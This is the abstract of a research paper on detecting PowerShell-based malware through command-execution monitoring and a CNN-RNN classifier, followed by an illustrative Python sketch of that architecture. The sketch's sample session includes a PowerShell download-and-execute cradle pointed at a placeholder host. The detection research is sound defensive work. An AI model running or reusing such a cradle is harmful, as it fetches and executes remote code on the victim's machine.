http://dx.doi.org/10.13089/JKIISC.2018.28.5.1197

PowerShell-based Malware Detection Method Using Command Execution Monitoring and Deep Learning  

Lee, Seung-Hyeon (Graduate School of Information Security, Korea University)
Moon, Jong-Sub (Graduate School of Information Security, Korea University)
Abstract
PowerShell is a command line shell and scripting language built on the .NET framework, and it has several advantages as an attack tool, including built-in support on Windows, easy code concealment and persistence, and availability in various pen-test frameworks. Accordingly, malware using PowerShell is increasing rapidly, while conventional malware detection techniques have limited ability to cope with it. In this paper, we propose an improved monitoring method that observes the commands executed in PowerShell, and a deep learning based malware classification model that extracts features from each command using a Convolutional Neural Network (CNN) and feeds them to a Recurrent Neural Network (RNN) in the order of execution. Testing the proposed model with 5-fold cross validation on 1,916 PowerShell-based malware samples collected from a malware sharing site and 38,148 benign scripts disclosed by an obfuscation detection study shows that the model detects malware effectively, with about 97% True Positive Rate (TPR) and 1% False Positive Rate (FPR).
Keywords
PowerShell; malware; execution monitoring; deep learning
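The abstract describes a model that builds a CNN feature vector for every observed command and feeds those vectors to an RNN in execution order. The following pure-Python sketch, added here and not code from the paper, shows that data flow end to end on a constructed PowerShell session: byte-level encoding of each command, a 1-D convolution with global max-pooling per command, and an Elman RNN over the command sequence. Sizes (MAX_LEN, KERNEL, EMB, FILT, HID) and the seeded random weights are assumptions that illustrate the architecture, not a trained classifier.

```python
import math
import random

# Constructed sample: commands from one PowerShell session, in execution order
# (hypothetical input, not data from the paper).
SESSION = [
    "Get-Process | Where-Object { $_.CPU -gt 100 }",
    "$c = New-Object System.Net.WebClient",
    "Invoke-Expression $c.DownloadString('http://example.invalid/p.ps1')",
]
MAX_LEN, KERNEL = 64, 3          # chars kept per command, conv width (assumed)
EMB, FILT, HID = 8, 4, 6         # embedding / filter / hidden sizes (assumed)

def encode_session(cmds, max_len=MAX_LEN):
    """Map each command to a fixed-length row of byte ids (0 = padding)."""
    rows = []
    for cmd in cmds:
        ids = [b + 1 for b in cmd.encode("utf-8")[:max_len]]
        rows.append(ids + [0] * (max_len - len(ids)))
    return rows                                  # (n_commands, max_len)

def rand_matrix(r, c, rng):
    return [[rng.uniform(-0.1, 0.1) for _ in range(c)] for _ in range(r)]

def cnn_features(ids, emb, conv):
    """Embed chars, slide KERNEL-wide filters over the command, max-pool, ReLU."""
    x = [emb[i] for i in ids]                    # (max_len, EMB)
    feats = []
    for f in range(FILT):
        best = max(sum(x[t + k][e] * conv[f][k * EMB + e]
                       for k in range(KERNEL) for e in range(EMB))
                   for t in range(len(x) - KERNEL + 1))
        feats.append(max(best, 0.0))
    return feats                                 # (FILT,)

def score_session(cmds, seed=0):
    """CNN feature vector per command, then an Elman RNN over the commands in
    execution order; returns a malicious probability. Weights are seeded random
    values that only illustrate the data flow, not a trained model."""
    rng = random.Random(seed)
    emb, conv = rand_matrix(257, EMB, rng), rand_matrix(FILT, KERNEL * EMB, rng)
    w_in, w_h = rand_matrix(HID, FILT, rng), rand_matrix(HID, HID, rng)
    w_out = rand_matrix(1, HID, rng)
    h = [0.0] * HID
    for ids in encode_session(cmds):
        f = cnn_features(ids, emb, conv)
        h = [math.tanh(sum(w_in[j][i] * f[i] for i in range(FILT))
                       + sum(w_h[j][k] * h[k] for k in range(HID)))
             for j in range(HID)]
    logit = sum(w_out[0][k] * h[k] for k in range(HID))
    return 1.0 / (1.0 + math.exp(-logit))

if __name__ == "__main__":
    print(f"malicious probability: {score_session(SESSION):.3f}")
```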